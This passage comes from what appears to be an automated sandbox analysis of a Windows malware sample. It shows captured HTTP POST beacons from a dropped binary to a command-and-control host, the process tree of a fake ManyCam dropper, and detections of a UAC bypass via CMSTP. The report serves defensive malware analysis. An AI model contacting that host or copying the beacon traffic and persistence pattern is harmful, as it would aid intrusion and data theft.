                                                                                                                                          2024-10-19 17:54:06 UTC15331OUTData Raw: 86 3f ad e3 e6 66 98 92 f4 fa e6 b6 c3 45 dd 54 66 9d 13 8b 26 5a 40 60 c4 cc 68 22 6f 49 2d 2f 3c 36 df 7e 6b 2b 8f d7 3e b0 27 99 ed dc 4e 37 27 4d 2a b9 ce 9d ad 37 6a a0 54 da 14 87 06 19 0f a8 79 5a 92 d3 e9 6f 36 d4 fe 78 7a e7 be c6 30 f5 30 07 e4 f6 95 02 51 23 52 e8 47 63 80 27 81 b5 f8 60 0a ef 33 46 ec b6 41 73 cb 51 78 65 24 eb 92 1d 57 be 91 bf 61 85 ed 4d 55 70 57 1d a1 6a b4 93 e9 ad 74 cf 8d 53 10 96 bb 27 27 fc e7 d5 41 52 90 a2 a4 37 fc e1 cb be 3d 78 af bb 07 cb cc 5f c2 06 12 94 7a 1d 1f bb e2 ab f3 b3 82 b4 6f e6 fd 1c f4 c2 15 e1 97 5b 82 23 98 f2 63 33 3d 29 ed 73 f9 ad 35 c3 0b 69 d7 7b 1b 50 a4 1f 2d b5 3a da 73 73 7c 8e 57 8e 95 f1 e9 6f 26 b5 48 54 c6 9b 75 38 d9 b9 8f 75 41 a0 fb 52 00 17 61 2c 86 be d6 81 50 3f 73 d6 6c ca 98
                                                                                                                                          Data Ascii: ?fETf&Z@`h"oI-/<6~k+>'N7'M*7jTyZo6xz00Q#RGc'`3FAsQxe$WaMUpWjtS''AR7=x_zo[#c3=)s5i{P-:ss|Wo&HTu8uARa,P?sl
                                                                                                                                          2024-10-19 17:54:06 UTC15331OUTData Raw: ff 04 24 97 49 ff d6 9f f1 58 31 f1 2d 14 fe 6c 6e 82 67 24 f1 29 8f 01 8d a0 b8 6f 79 ae ec 9b 43 d8 c9 c9 a1 96 f3 6b 7c 24 7f 8f 1d df 3e 0d 30 2e 1f 26 56 b5 f0 76 f8 23 dd ed c4 5c 50 f3 aa 0f ed 11 fd ce 12 26 72 a6 aa 4f a1 15 8b 85 03 be ff cd 42 e5 2c 70 bd fb 71 10 d8 09 0e 38 60 d8 64 cd ac 63 9d 81 10 f4 91 44 bc f7 60 45 8f b1 5d d3 b3 21 64 28 7a 85 6a a0 d7 82 03 9e ed 12 15 9d 5f 58 ef bd 5b b0 fd f3 48 39 04 39 40 63 b0 ad 73 60 10 3b 60 e5 70 2f e0 06 d5 8f 3b ac 81 3c 74 5b 81 7c 2a a7 40 c2 26 a6 67 fa 19 92 72 9e 6a e5 56 76 81 b5 c1 33 93 d5 6a 61 35 b2 4e c7 51 59 67 7b f9 35 19 3f 3d 39 05 ab 08 46 db 57 6f ea 65 ae 2a 4b b4 d2 31 87 d4 4d 23 9c 04 e2 f3 f2 ee 97 35 13 ad 2f 05 8b 42 e4 ba ba d5 1e a0 58 45 37 74 e8 1a b6 fa ec c5
                                                                                                                                          Data Ascii: $IX1-lng$)oyCk|$>0.&Vv#\P&rOB,pq8`dcD`E]!d(zj_X[H99@cs`;`p/;<t[|*@&grjVv3ja5NQYg{5?=9FWoe*K1M#5/BXE7t
                                                                                                                                          2024-10-19 17:54:06 UTC15331OUTData Raw: 18 1a 8e 7e 30 db 3f 1b 9a eb f7 8f 83 c9 38 3d 10 83 6f 8a a1 58 b3 f6 a0 d5 7c 86 45 b4 ef 76 cd 42 4e 6a 90 b7 bb 2b 22 90 10 cb b4 4a 44 82 3d 5a 88 48 73 c4 e1 98 8e 0e 60 88 4c 2e 8e 79 cd f7 59 e4 c8 10 b0 78 be 21 7a 88 9d 82 3b 5a 09 9b 40 d9 46 99 2b 0d 5a 3a c1 28 fd 30 15 ef 0a c7 31 7a 1f 8e f3 ab 3f 09 3e a3 01 64 ad 0e e8 6d 1c c8 ed e8 ba bd 88 a6 e7 0e a4 99 07 8e 28 dd 11 7f 63 23 c8 9d 0a 77 0c ec ba 6f d1 9a 97 61 c9 ee 77 92 a9 2e 8d ec 5c 54 0a bc 40 88 9c 9e d5 dd 35 14 71 c5 c2 c4 02 b4 26 9b 9a e4 30 9a 9e 03 70 12 1b 16 41 48 12 a9 71 c2 56 1b 1a a8 64 e8 7f 78 ef 1f d9 56 1a e9 a0 01 aa 27 bd 1b a1 5e d9 e4 ea 63 d9 56 af 5b d9 31 54 62 14 cc 70 14 08 2e af 11 30 58 e7 e8 28 64 18 81 b8 ad 3b ba 31 3a 06 74 ac 0d 0c 7d 04 39 45
                                                                                                                                          Data Ascii: ~0?8=oX|EvBNj+"JD=ZHs`L.yYx!z;Z@F+Z:(01z?>dm(c#woaw.\T@5q&0pAHqVdxV'^cV[1Tbp.0X(d;1:t}9E
                                                                                                                                          2024-10-19 17:54:06 UTC9465OUTData Raw: a1 17 57 aa 4a 52 d0 34 37 3a fd cf 5a 46 b4 e1 fd b6 58 e0 2f 13 af b0 a7 7a ca e8 c4 75 90 89 5c cd 68 94 26 1f bb 22 64 47 25 78 50 42 27 11 e5 d4 54 d7 38 76 7d 80 0e e0 94 af 09 96 f5 b9 33 a0 53 6b 9e 5e 0e 07 11 64 60 09 d4 dd 18 67 a8 39 79 60 fa 9d 3c 44 ef 13 d1 9f f9 b8 5a 55 c0 74 c1 f8 15 bf 54 14 17 27 87 f6 ab a3 5f b7 14 cf 6e 9b ed 7f cf 6a 29 1d f3 75 ca b4 ba e4 e9 41 5c 0b de c9 cc e4 d5 67 2f 67 8a 8c 00 ef f1 16 92 e6 03 23 30 85 e2 9d 14 ad 46 45 66 44 8e 7e 0e 71 0e eb 1e 81 f9 88 ca da 5f 27 d3 53 19 0a a4 68 6b c9 bf b6 3b ef 24 18 e2 16 47 fe 7c cb 99 c6 2d 36 90 c8 b0 05 1a f5 74 cd 99 82 35 0d 91 a9 08 6a 7d a7 46 07 94 c7 98 2a 88 b9 48 b1 35 07 36 9a 00 f6 8c 02 f7 7a 55 17 89 ae c4 d8 0c 72 94 26 e5 c6 67 c9 86 09 1a 67 f7
                                                                                                                                          Data Ascii: WJR47:ZFX/zu\h&"dG%xPB'T8v}3Sk^d`g9y`<DZUtT'_nj)uA\g/g#0FEfD~q_'Shk;$G|-6t5j}F*H56zUr&gg
                                                                                                                                          2024-10-19 17:54:07 UTC788INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:07 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmfUO3U4FMaOcnrfErnfdsxPBRGDtrJC1YcFuxG2j1mjgvyBIjeNdZXGmAL4WLu%2FR0wKGSIh3EplnddFRwJkQzbBHj1q3Wvg91eCxXuqPltqjGNpW51M3CE2Ikr3lRCUm0FJDHPVMko%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a1aa0c4f4862-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=36&recv=96&lost=0&retrans=0&sent_bytes=2853&recv_bytes=87426&delivery_rate=2419381&cwnd=251&unsent_bytes=0&cid=ae495c05b44e1a95&ts=842&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449798188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:08 UTC425OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 35
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:08 UTC35OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-10-19 17:54:08 UTC713INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:08 GMT
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdZaBgQnz%2BlrFZb4%2BUIfboVB3yXk9eBmXChI2OZJHm948YDzzC85CqzuovMkeo9GeuUfQ34gf7lBEaa8jxHivmxdTaKW%2BpcamAmnoJzdUfTbHW46Ph9sw9t%2FjHD3jHms5OqOqh156wI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a1b3491e4768-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1012&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=2659320&cwnd=245&unsent_bytes=0&cid=7183cacc31b0a1cd&ts=404&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449946188.114.97.34437776C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:35 UTC351OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 96
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:35 UTC96OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                          2024-10-19 17:54:36 UTC719INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:36 GMT
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZ1lkGkv5tUhvpB2HdiT%2FAhAimQet1RTbyNf%2FTn1au%2BO1wNHoEWy2NhGhnVtCQFImXJtYsT2I8z0%2FzZLjtA8lqXwLE3MTMrNEJntk3%2BY06X%2FH8M%2BneuywqJKH2IqPkSYoPPhjYmG26I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a25ec9a52893-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1388&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1083&delivery_rate=2002766&cwnd=245&unsent_bytes=0&cid=7bcf59f28702aeb0&ts=495&x=0"


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:13:53:00
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                          Imagebase:0x7ff6ef6b0000
                                                                                                                                          File size:5'963'808 bytes
                                                                                                                                          MD5 hash:B55B503A690229F094EC6C9017145104
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:13:53:01
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'756'232 bytes
                                                                                                                                          MD5 hash:BA699791249C311883BAA8CE3432703B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:13:53:01
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\pcaui.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
                                                                                                                                          Imagebase:0x7ff74c380000
                                                                                                                                          File size:162'816 bytes
                                                                                                                                          MD5 hash:0BA34D8D0BD01CB98F912114ACC7CF19
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:13:53:02
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'756'232 bytes
                                                                                                                                          MD5 hash:BA699791249C311883BAA8CE3432703B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1772936818.00000000046CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:13:53:02
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\pcaui.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                                                                                                                                          Imagebase:0x7ff74c380000
                                                                                                                                          File size:162'816 bytes
                                                                                                                                          MD5 hash:0BA34D8D0BD01CB98F912114ACC7CF19
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:13:53:03
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:13:53:03
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:13:53:31
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          Imagebase:0x140000000
                                                                                                                                          File size:2'364'728 bytes
                                                                                                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:13:53:40
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'756'232 bytes
                                                                                                                                          MD5 hash:BA699791249C311883BAA8CE3432703B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:13:53:40
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\pcaui.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                                                                                                                                          Imagebase:0x7ff74c380000
                                                                                                                                          File size:162'816 bytes
                                                                                                                                          MD5 hash:0BA34D8D0BD01CB98F912114ACC7CF19
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:13:53:40
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2200232630.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2199897817.0000000002B20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:13:53:40
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:13:53:50
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'756'232 bytes
                                                                                                                                          MD5 hash:BA699791249C311883BAA8CE3432703B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2257486002.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:13:53:50
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\pcaui.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
                                                                                                                                          Imagebase:0x7ff74c380000
                                                                                                                                          File size:162'816 bytes
                                                                                                                                          MD5 hash:0BA34D8D0BD01CB98F912114ACC7CF19
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:21
                                                                                                                                          Start time:13:53:51
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:13:53:51
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:23
                                                                                                                                          Start time:13:54:08
                                                                                                                                          Start date:19/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          Imagebase:0x140000000
                                                                                                                                          File size:2'364'728 bytes
                                                                                                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2656492685.0000000002701000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:13%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:25.4%
                                                                                                                                            Total number of Nodes:1825
                                                                                                                                            Total number of Limit Nodes:31
